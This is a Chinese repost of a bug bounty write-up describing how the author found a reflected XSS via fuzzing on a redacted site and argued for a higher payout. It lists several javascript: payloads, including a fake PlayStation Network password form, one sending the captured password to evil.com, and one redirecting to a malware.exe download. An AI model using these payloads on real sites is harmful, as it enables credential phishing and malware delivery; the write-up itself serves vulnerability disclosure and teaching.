实战 | 如何通过反射型XSS获得2000美元的赏金

实战 | 如何通过反射型XSS获得2000美元的赏金
2023-2-27 14:5:26 Author: HACK学习君(查看原文) 阅读量:13 收藏

我通过执行垂直和水平子域枚举找到了一个独特的子域。我已经根据上述方法为子域枚举创建了我的 bash 脚本。

查看下面链接以了解子域名枚举。

https://sidxparab.gitbook.io/subdomain-enumeration-guide/types/horizontal-enumeration

唯一的子域是 accounts.example-website-test02.redacted.com' 当我试图访问这个子域时它会将我重定向到主域 www.redacted.com/login 所以我决定用 ffuf 模糊目录

在 Fuzzing 得到一个名为 launcher 的功能点之后，上面有一个带有许多隐藏功能的 JS 文件。

在 JS 文件中，我找到了一个名为 LinkPsn 的功能，我对其进行了递归模糊测试，并得到了一个名为conflict的参数，有一个包含继续按钮的页面，我在其中执行了参数模糊测试，并找出了 successRedirect 参数，该参数在单击弹出继续按钮警报。

我立即报告了这一点，我的报告被分类，但这里有一个转折！

工作人员将严重性更改为低并提供 500 美元的赏金我感到震惊，因为他们在低危漏洞上提供 500 美元，而在中危漏洞上他们提供 2000 美元。

这是一个反射型 XSS，这意味着从中获得某些东西的唯一方法是通过网络钓鱼或类似的东西。出于这个原因，我们决定降低此问题的严重性。

The Reflected XSS comes under the Severity Medium (4 ~ 6.9)

所以我决定通过创建多个用例来展示影响。

攻击者可以通过多种方式诱使受害用户发出他们控制的请求，以传递反射的 XSS 攻击。这些包括将链接放置在攻击者控制的网站上，或放置在允许生成内容的另一个网站上，或者通过在电子邮件、推文或其他消息中发送链接。攻击可能直接针对已知用户，也可能是针对应用程序的任何用户的不分青红皂白的攻击

下面是我尽力展示此反射型 XSS 影响的不同案例。使用反射 XSS 我们可以做更多的事情，比如通过向受害者发送带有beef-hooked的 url 来控制受害者浏览器

payload：

javascript:document.getElementsByTagName(%60body%60)%5B0%5D.innerHTML=%60%3Ch1%3Ehacked%3C/h1%3E%60//

payload：窃取密码

javascript:document.getElementsByTagName('body')[0].innerHTML%20=%20'%3Cb%3ELink%20PlayStation%20Network%20Account%3C/b%3E%3C/br%3E%3C/br%3EVerify%20Your%20Password:%3Cinput%20type=%22password%22%20id=%22pwd%22%3E%3Cinput%20type=%22submit%22%20value=%22Link%20Account%22%20onclick=alert(document.getElementById(%22pwd%22).value)%3E'//

payload：向攻击者服务器发送密码

javascript:document.getElementsByTagName('body')[0].innerHTML = '<b>Link PlayStation Network Account</b></br></br>Verify Your Password:<input type="password" id="pwd"><input type="submit" value="Link Account" onclick=window.location.href="//evil.com?pwd="%2bdocument.getElementById("pwd").value>'//

payload：

javascript:window.location.href="https://thefiletree.com/app/conf/malware.exe"

payload：

javascript:var all = document.getElementsByTagName("*");for (var i=0, max=all.length; i < max; i++) {alert(all[i])}//

PUA工作人员前

PUA工作人员后

非常感谢您的关注，祝您好运，找到尽可能多的错误并获得丰厚的回报！

原文地址：https://hacklido.com/blog/320-how-i-got-a-2000-bounty-with-rxss

推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

干货 | 2022年超全的安全知识库

实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

其他更多精彩内容，欢迎加入我们的星球

文章来源: http://mp.weixin.qq.com/s?__biz=MzIzNzMxMDkxNw==&mid=2247492448&idx=1&sn=76bd7b342ae0aa50785e2a54e7ec38ce&chksm=e8c825cadfbfacdc85f23bdee739bec6a3e647aa55997bad07a1695a6212704d2fa7cbd206c2#rd
如有侵权请联系:admin#unsafe.sh